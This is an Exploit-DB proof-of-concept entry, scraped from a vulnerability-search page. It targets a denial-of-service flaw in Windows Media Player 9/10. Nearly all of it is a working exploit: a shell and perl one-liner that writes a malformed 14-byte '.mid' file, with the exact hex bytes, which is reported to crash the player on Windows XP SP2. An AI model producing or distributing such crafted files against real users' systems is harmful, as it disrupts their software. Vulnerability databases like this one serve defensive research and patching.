Lucene search

K
exploitdbSehatoEDB-ID:2935
HistoryDec 15, 2006 - 12:00 a.m.

Microsoft Windows Media Player 9/10 - '.mid' Denial of Service

2006-12-1500:00:00
sehato
www.exploit-db.com
30

AI Score

7.4

Confidence

Low

#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte

perl -e 'print "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00"' > example.mid

# milw0rm.com [2006-12-15]

AI Score

7.4

Confidence

Low

Related for EDB-ID:2935